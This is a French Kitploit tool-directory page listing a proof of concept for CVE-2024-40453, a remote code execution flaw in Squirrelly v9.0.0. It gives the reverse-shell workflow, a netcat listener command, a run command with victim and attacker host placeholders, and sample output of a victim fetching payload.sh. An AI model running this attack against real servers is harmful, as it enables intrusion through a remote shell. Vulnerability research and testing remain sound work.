Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-40453 — CVE-2024-40453 - Squirrelly v9.0.0 RCE. Poc | Kitploit
Outils/GitHubGitHub/bwithe/cve-2024-40453
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubbwithe/cve-2024-40453

CVE-2024-40453

CVE-2024-40453 - Squirrelly v9.0.0 RCE. Poc

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-40453 - Squirrelly v9.0.0 RCE

Avertissement :

Ce script est uniquement destiné à un usage éducatif.

Ne l’utilisez pas à des fins illégales.

Si vous le faites, cela relève entièrement de votre responsabilité ; je ne suis pas responsable de toute utilisation abusive.

Description

Ce script crée un reverse shell appelé payload.sh dans le répertoire courant.

Ensuite, il héberge un serveur HTTP sur le port 80 pour que la victime puisse récupérer le payload.sh.

Un écouteur doit être démarré sur la machine de l’attaquant.

Le serveur HTTP s’arrête après 3 secondes pour permettre à la victime de récupérer et d’exécuter le payload.sh.

EXPLICATION DE L’EXPLOIT

Basé sur les informations suivantes, cette POC a été développée. https://samuzora.com/posts/cve-2024-40453

UTILISATION

Démarrez votre écouteur

root@kitploit:~
rlwrap nc -nvlp 3000

Exécutez le payload

root@kitploit:~
# python3 poc.py -rhost <VICTIM_IP> -rport <VICTIM_PORT> -lhost <ATTACKER_IP> -lport <ATTACKER_LISTENER_PORT>

python3 poc.py -rhost 172.16.0.2 -rport 3000 -lhost 172.16.0.1 -lport 3000
[+] Payload created at payload.sh
[*] Hosting HTTP server on port 80
[*] Triggering remote execution
172.16.0.2 - - [13/Jun/2025 22:21:10] "GET /payload.sh HTTP/1.1" 200 -
[*] Shutting down HTTP server on port 80
[!] Check your listener!

Télécharger l’outil